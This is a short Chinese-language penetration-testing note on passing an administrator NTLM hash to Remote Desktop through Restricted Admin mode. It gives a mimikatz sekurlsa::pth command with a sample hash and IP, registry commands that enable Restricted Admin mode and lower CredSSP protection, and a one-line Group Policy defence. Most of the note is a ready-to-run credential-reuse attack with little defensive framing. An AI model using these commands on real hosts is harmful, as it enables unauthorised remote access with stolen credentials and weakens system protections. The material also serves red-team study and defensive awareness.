(Pass The Hash With Remote Desktop)
注入的哈希用户需要是目标机器的本地管理员
场景
假设抓取到了administrator用户的哈希,想利用该哈希以administrator用户的身份RDP登录主机,Windows Server 2012 R2及其以上版本的Windows系统的远程桌面服务支持 Restricted Admin mode。也就是使用当前账户的hash凭据来登录远程桌面,无需输入明文密码。
条件:
1. Win10、win12的机器才可以利用,Windows 7和Server 2008默认不支持,需要安装2871997、2973351补丁
2. 如果用户只在Remote Desktop Users组中是无法连接成功的,因为该机制就是针对受限的管理员模式。
复现
在Windows Server 2012 R2及其以上版本的Windows系统中以管理员权限执行如下命令: sekurlsa::pth /user:administrator /domain:192.168.16.62 /ntlm:06d8a9bafc009e178100087bb4e31ada “/run:mstsc.exe /restrictedadmin”
![](http://cdn.1zzzzz.com/mweb/%E6%9C%AA%E7%9F%A5%2099_Y8-EZvXdJ1.jpg)
如果目标机器没有开启Restricted Admin mode可以执行如下命令开启
REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
查看是否已开启 DisableRestrictedAdmin REG_DWORD 0x0 存在就是开启
REG query “HKLM\System\CurrentControlSet\Control\Lsa” | findstr “DisableRestrictedAdmin”
遇到CredSSP加密数据库错误是大概是因为win10家庭版,一条命令直接解决。
REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters /v AllowEncryptionOracle /t REG_DWORD /d 2 /f
防御措施
组策略 — 计算机配置 — 管理模板 — 系统 — 凭据分配 — 限制向远程服务器分配凭据,选择已启用
![](http://cdn.1zzzzz.com/mweb/caf0f5eb-4dc8-4cc4-a346-da45355bbe19%202_CB7WlyECvk.png)
History
- Created 2022-10-22 11:35
- Published 2021-06-17 11:36
- Updated 2022-10-22 11:37